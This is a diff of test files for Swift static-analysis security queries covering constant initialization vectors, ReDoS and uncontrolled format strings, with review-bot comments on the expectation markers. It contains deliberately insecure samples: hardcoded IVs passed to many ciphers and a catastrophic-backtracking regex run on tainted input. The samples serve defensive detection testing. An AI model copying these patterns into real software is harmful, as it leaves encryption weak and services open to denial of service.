rncryptor.swift:83:113:83:113 | myConstIV4 | The static value 'iv' is used as an initialization vector for encryption. | -| test.swift:54:17:54:17 | iv | test.swift:99:25:99:120 | [...] | test.swift:54:17:54:17 | iv | The static value '[...]' is used as an initialization vector for encryption. 
| -| test.swift:112:36:112:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:112:36:112:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:113:36:113:36 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:113:36:113:36 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:118:41:118:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:118:41:118:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:122:41:122:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:122:41:122:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:123:41:123:41 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:123:41:123:41 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:128:33:128:33 | iv | test.swift:99:25:99:120 | [...] | test.swift:128:33:128:33 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:129:33:129:33 | iv2 | test.swift:85:3:85:3 | this string is constant | test.swift:129:33:129:33 | iv2 | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:130:39:130:39 | ivString | test.swift:85:3:85:3 | this string is constant | test.swift:130:39:130:39 | ivString | The static value 'this string is constant' is used as an initialization vector for encryption. | -| test.swift:135:22:135:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:135:22:135:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:139:22:139:22 | iv | test.swift:99:25:99:120 | [...] 
| test.swift:139:22:139:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:140:22:140:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:140:22:140:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:145:22:145:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:145:22:145:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:146:22:146:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:146:22:146:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:147:22:147:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:147:22:147:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:153:22:153:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:153:22:153:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:157:24:157:24 | iv | test.swift:99:25:99:120 | [...] | test.swift:157:24:157:24 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:161:22:161:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:161:22:161:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:162:22:162:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:162:22:162:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:167:22:167:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:167:22:167:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | -| test.swift:168:22:168:22 | iv | test.swift:99:25:99:120 | [...] | test.swift:168:22:168:22 | iv | The static value '[...]' is used as an initialization vector for encryption. | 
diff --git a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref
index 36f922580f70..6106d4b12ad9 100644
--- a/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref
+++ b/swift/ql/test/query-tests/Security/CWE-1204/StaticInitializationVector.qlref
@@ -1 +1,2 @@
-queries/Security/CWE-1204/StaticInitializationVector.ql
+query: queries/Security/CWE-1204/StaticInitializationVector.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift
index 253804cabf15..ea16f7e28234 100644
--- a/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift
+++ b/swift/ql/test/query-tests/Security/CWE-1204/rncryptor.swift
@@ -57,28 +57,28 @@ func test(myPassword: String) { let myKeyDerivationSettings = RNCryptorKeyDerivationSettings() let myHandler = {} let myRandomIV = Data(getRandomArray()) - let myConstIV1 = Data(0) - let myConstIV2 = Data(123) - let myConstIV3 = Data([1,2,3,4,5]) - let myConstIV4 = Data("iv") + let myConstIV1 = Data(0) // $ Source + let myConstIV2 = Data(123) // $ Source + let myConstIV3 = Data([1,2,3,4,5]) // $ Source + let myConstIV4 = Data("iv") // $ Source let mySalt = Data(0) let mySalt2 = Data(0) let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myRandomIV, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myRandomIV, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myRandomIV, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myRandomIV, 
encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2, handler: myHandler) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myRandomIV) // GOOD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, encryptionKey: myKey, hmacKey: myHMACKey, iv: myConstIV1) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myRandomIV) // GOOD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2) // BAD + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, encryptionKey: myKey, HMACKey: myHMACKey, IV: myConstIV2) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myRandomIV, encryptionSalt: mySalt, hmacSalt: mySalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myConstIV3, encryptionSalt: mySalt, hmacSalt: mySalt2) // BAD // $ Alert let _ = try? 
myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myRandomIV, encryptionSalt: mySalt, HMACSalt: mySalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myConstIV4, encryptionSalt: mySalt, HMACSalt: mySalt2) // BAD // $ Alert } diff --git a/swift/ql/test/query-tests/Security/CWE-1204/test.swift b/swift/ql/test/query-tests/Security/CWE-1204/test.swift index 273556ce5bba..a0c4eb028fdf 100644 --- a/swift/ql/test/query-tests/Security/CWE-1204/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-1204/test.swift @@ -51,7 +51,7 @@ final class GCM: BlockMode { enum Mode { case combined, detached } init(iv: Array, additionalAuthenticatedData: Array? = nil, tagLength: Int = 16, mode: Mode = .detached) { } convenience init(iv: Array, authenticationTag: Array, additionalAuthenticatedData: Array? = nil, mode: Mode = .detached) { - self.init(iv: iv, additionalAuthenticatedData: additionalAuthenticatedData, tagLength: authenticationTag.count, mode: mode) + self.init(iv: iv, additionalAuthenticatedData: additionalAuthenticatedData, tagLength: authenticationTag.count, mode: mode) // $ Alert } } @@ -82,7 +82,7 @@ enum Padding: PaddingProtocol { // Helper functions func getConstantString() -> String { - "this string is constant" + "this string is constant" // $ Source } func getConstantArray() -> Array { @@ -96,7 +96,7 @@ func getRandomArray() -> Array { // --- tests --- func test() { - let iv: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] + let iv: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] // $ Source let iv2 = getConstantArray() let ivString = getConstantString() 
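Review bot: The `// $ Alert` added to `self.init(iv: iv, …)` in the `GCM` stub's convenience initializer (hunk `@@ -51,7 +51,7 @@` of CWE-1204/test.swift) has no explanation, while the other alert lines in the visible hunks of this file are all marked `// BAD`. The `.expected` row for test.swift:54 names the constant array at test.swift:99 as its source, so this looks like flow passing through the stub, presumably from the `GCM(iv:authenticationTag:…)` call in `test()`, not a test case of its own. A short trailing comment would say so, for example `// $ Alert // constant iv from test() reaches the designated initializer through this stub`. The `GCM` class body starts before the hunk.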
@@ -109,63 +109,63 @@ func test() { let keyString = String(cString: key) // AES test cases - let ab1 = AES(key: keyString, iv: ivString) // BAD - let ab2 = AES(key: keyString, iv: ivString, padding: padding) // BAD + let ab1 = AES(key: keyString, iv: ivString) // BAD // $ Alert + let ab2 = AES(key: keyString, iv: ivString, padding: padding) // BAD // $ Alert let ag1 = AES(key: keyString, iv: randomIvString) // GOOD let ag2 = AES(key: keyString, iv: randomIvString, padding: padding) // GOOD // ChaCha20 test cases - let cb1 = ChaCha20(key: keyString, iv: ivString) // BAD + let cb1 = ChaCha20(key: keyString, iv: ivString) // BAD // $ Alert let cg1 = ChaCha20(key: keyString, iv: randomIvString) // GOOD // Blowfish test cases - let bb1 = Blowfish(key: keyString, iv: ivString) // BAD - let bb2 = Blowfish(key: keyString, iv: ivString, padding: padding) // BAD + let bb1 = Blowfish(key: keyString, iv: ivString) // BAD // $ Alert + let bb2 = Blowfish(key: keyString, iv: ivString, padding: padding) // BAD // $ Alert let bg1 = Blowfish(key: keyString, iv: randomIvString) // GOOD let bg2 = Blowfish(key: keyString, iv: randomIvString, padding: padding) // GOOD // Rabbit - let rb1 = Rabbit(key: key, iv: iv) // BAD - let rb2 = Rabbit(key: key, iv: iv2) // BAD - let rb3 = Rabbit(key: keyString, iv: ivString) // BAD + let rb1 = Rabbit(key: key, iv: iv) // BAD // $ Alert + let rb2 = Rabbit(key: key, iv: iv2) // BAD // $ Alert + let rb3 = Rabbit(key: keyString, iv: ivString) // BAD // $ Alert let rg1 = Rabbit(key: key, iv: randomIv) // GOOD let rg2 = Rabbit(key: keyString, iv: randomIvString) // GOOD // CBC - let cbcb1 = CBC(iv: iv) // BAD + let cbcb1 = CBC(iv: iv) // BAD // $ Alert let cbcg1 = CBC(iv: randomIv) // GOOD // CFB - let cfbb1 = CFB(iv: iv) // BAD - let cfbb2 = CFB(iv: iv, segmentSize: CFB.SegmentSize.cfb8) // BAD + let cfbb1 = CFB(iv: iv) // BAD // $ Alert + let cfbb2 = CFB(iv: iv, segmentSize: CFB.SegmentSize.cfb8) // BAD // $ Alert let cfbg1 = CFB(iv: randomIv) // GOOD 
let cfbg2 = CFB(iv: randomIv, segmentSize: CFB.SegmentSize.cfb8) // GOOD // GCM - let cgmb1 = GCM(iv: iv) // BAD - let cgmb2 = GCM(iv: iv, additionalAuthenticatedData: randomArray, tagLength: 8, mode: GCM.Mode.combined) // BAD - let cgmb3 = GCM(iv: iv, authenticationTag: randomArray, additionalAuthenticatedData: randomArray, mode: GCM.Mode.combined) // BAD + let cgmb1 = GCM(iv: iv) // BAD // $ Alert + let cgmb2 = GCM(iv: iv, additionalAuthenticatedData: randomArray, tagLength: 8, mode: GCM.Mode.combined) // BAD // $ Alert + let cgmb3 = GCM(iv: iv, authenticationTag: randomArray, additionalAuthenticatedData: randomArray, mode: GCM.Mode.combined) // BAD // $ Alert let cgmg1 = GCM(iv: randomIv) // GOOD let cgmg2 = GCM(iv: randomIv, additionalAuthenticatedData: randomArray, tagLength: 8, mode: GCM.Mode.combined) // GOOD let cgmg3 = GCM(iv: randomIv, authenticationTag: randomArray, additionalAuthenticatedData: randomArray, mode: GCM.Mode.combined) // GOOD // OFB - let ofbb1 = OFB(iv: iv) // BAD + let ofbb1 = OFB(iv: iv) // BAD // $ Alert let ofbg1 = OFB(iv: randomIv) // GOOD // PCBC - let pcbcb1 = PCBC(iv: iv) // BAD + let pcbcb1 = PCBC(iv: iv) // BAD // $ Alert let pcbcg1 = PCBC(iv: randomIv) // GOOD // CCM - let ccmb1 = CCM(iv: iv, tagLength: 0, messageLength: 0, additionalAuthenticatedData: randomArray) // BAD - let ccmb2 = CCM(iv: iv, tagLength: 0, messageLength: 0, authenticationTag: randomArray, additionalAuthenticatedData: randomArray) // BAD + let ccmb1 = CCM(iv: iv, tagLength: 0, messageLength: 0, additionalAuthenticatedData: randomArray) // BAD // $ Alert + let ccmb2 = CCM(iv: iv, tagLength: 0, messageLength: 0, authenticationTag: randomArray, additionalAuthenticatedData: randomArray) // BAD // $ Alert let ccmg1 = CCM(iv: randomIv, tagLength: 0, messageLength: 0, additionalAuthenticatedData: randomArray) // GOOD let ccmg2 = CCM(iv: randomIv, tagLength: 0, messageLength: 0, authenticationTag: randomArray, additionalAuthenticatedData: randomArray) // GOOD // CTR 
- let ctrb1 = CTR(iv: iv) // BAD - let ctrb2 = CTR(iv: iv, counter: 0) // BAD + let ctrb1 = CTR(iv: iv) // BAD // $ Alert + let ctrb2 = CTR(iv: iv, counter: 0) // BAD // $ Alert let ctrg1 = CTR(iv: randomIv) // GOOD let ctrg2 = CTR(iv: randomIv, counter: 0) // GOOD } diff --git a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref index a0bdcd8a864c..5294bedca639 100644 --- a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref +++ b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.qlref @@ -1 +1,2 @@ -queries/Security/CWE-1333/ReDoS.ql \ No newline at end of file +query: queries/Security/CWE-1333/ReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift index 0349bac0669d..91beb7118da1 100644 --- a/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift +++ b/swift/ql/test/query-tests/Security/CWE-1333/ReDoS.swift 
@@ -61,25 +61,25 @@ func myRegexpTests(myUrl: URL) throws { // Regex _ = "((a*)*b)" // GOOD (never used) - _ = try Regex("((a*)*b)") // DUBIOUS (never used) [FLAGGED] - _ = try Regex("((a*)*b)").firstMatch(in: untainted) // DUBIOUS (never used on tainted input) [FLAGGED] - _ = try Regex("((a*)*b)").firstMatch(in: tainted) // BAD + _ = try Regex("((a*)*b)") // DUBIOUS (never used) [FLAGGED] // $ Alert + _ = try Regex("((a*)*b)").firstMatch(in: untainted) // DUBIOUS (never used on tainted input) [FLAGGED] // $ Alert + _ = try Regex("((a*)*b)").firstMatch(in: tainted) // BAD // $ Alert _ = try Regex(".*").firstMatch(in: tainted) // GOOD (safe regex) - let str = "((a*)*b)" // BAD + let str = "((a*)*b)" // BAD // $ Alert let regex = try Regex(str) _ = try regex.firstMatch(in: tainted) - _ = try Regex(#"(?is)X(?:.|\n)*Y"#) // BAD - suggested attack should begin with 'x' or 'X', *not* 'isx' or 'isX' + _ = try Regex(#"(?is)X(?:.|\n)*Y"#) // BAD - suggested attack should begin with 'x' or 'X', *not* 'isx' or 'isX' // $ Alert // NSRegularExpression - _ = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used) [FLAGGED] + _ = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used) [FLAGGED] // $ Alert - let nsregex1 = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used on tainted input) [FLAGGED] + let nsregex1 = try? NSRegularExpression(pattern: "((a*)*b)") // DUBIOUS (never used on tainted input) [FLAGGED] // $ Alert _ = nsregex1?.stringByReplacingMatches(in: untainted, range: NSRange(location: 0, length: untainted.utf16.count), withTemplate: "") - let nsregex2 = try? NSRegularExpression(pattern: "((a*)*b)") // BAD + let nsregex2 = try? NSRegularExpression(pattern: "((a*)*b)") // BAD // $ Alert _ = nsregex2?.stringByReplacingMatches(in: tainted, range: NSRange(location: 0, length: tainted.utf16.count), withTemplate: "") let nsregex3 = try? NSRegularExpression(pattern: ".*") // GOOD (safe regex) 
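Review bot: The four lines commented `DUBIOUS … [FLAGGED]` (two `Regex` and two `NSRegularExpression` constructions) now carry the same `// $ Alert` as the `BAD` cases, so the inline expectation no longer records that these results are only tolerated. If they are regarded as false positives, the inline-expectations syntax can say so, e.g. `_ = try Regex("((a*)*b)") // DUBIOUS (never used) // $ SPURIOUS: Alert`. If they are wanted results, the `[FLAGGED]` tag is now redundant with `$ Alert` and can be dropped. Which of the two applies is the test author's call and cannot be read from the hunk. `myRegexpTests` starts before the hunk and continues after it.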
diff --git a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected
index 94dd27a82c2f..5e76f12687d2 100644
--- a/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected
+++ b/swift/ql/test/query-tests/Security/CWE-134/UncontrolledFormatString.expected
@@ -1,3 +1,27 @@ +#select +| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:111:33:111:57 | call to NSString.init(string:) | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:112:47:112:71 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:115:11:115:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:115:11:115:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:116:11:116:11 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:116:11:116:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:118:61:118:61 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:118:61:118:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:130:39:130:39 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:130:39:130:39 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:135:20:135:44 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:141:24:141:24 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:141:24:141:24 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:143:21:143:21 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:143:21:143:21 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:145:27:145:27 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:145:27:145:27 | cstr | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:147:35:147:35 | cstr | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:147:35:147:35 | cstr | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:154:26:154:26 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:154:26:154:26 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:156:32:156:32 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:156:32:156:32 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | edges | UncontrolledFormatString.swift:77:12:77:22 | format | UncontrolledFormatString.swift:78:22:80:5 | format | provenance | | | UncontrolledFormatString.swift:78:22:80:5 | format | UncontrolledFormatString.swift:78:22:80:5 | { ... } [format] | provenance | | 
@@ -72,27 +96,3 @@ nodes | UncontrolledFormatString.swift:154:26:154:26 | tainted | semmle.label | tainted | | UncontrolledFormatString.swift:156:32:156:32 | tainted | semmle.label | tainted | subpaths -#select -| UncontrolledFormatString.swift:79:16:79:16 | format | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:79:16:79:16 | format | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:97:24:97:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:97:24:97:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:100:24:100:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:100:24:100:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:101:24:101:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:101:24:101:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:103:24:103:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:103:24:103:24 | tainted | This format string depends on $@. 
| UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:104:24:104:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:104:24:104:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:105:24:105:24 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:105:24:105:24 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:106:42:106:42 | tainted | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:106:42:106:42 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:108:26:108:50 | call to NSString.init(string:) | This format string depends on $@. | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | this user-provided value | -| UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | UncontrolledFormatString.swift:91:24:91:77 | call to String.init(contentsOf:) | UncontrolledFormatString.swift:109:40:109:64 | call to NSString.init(string:) | This format string depends on $@. 
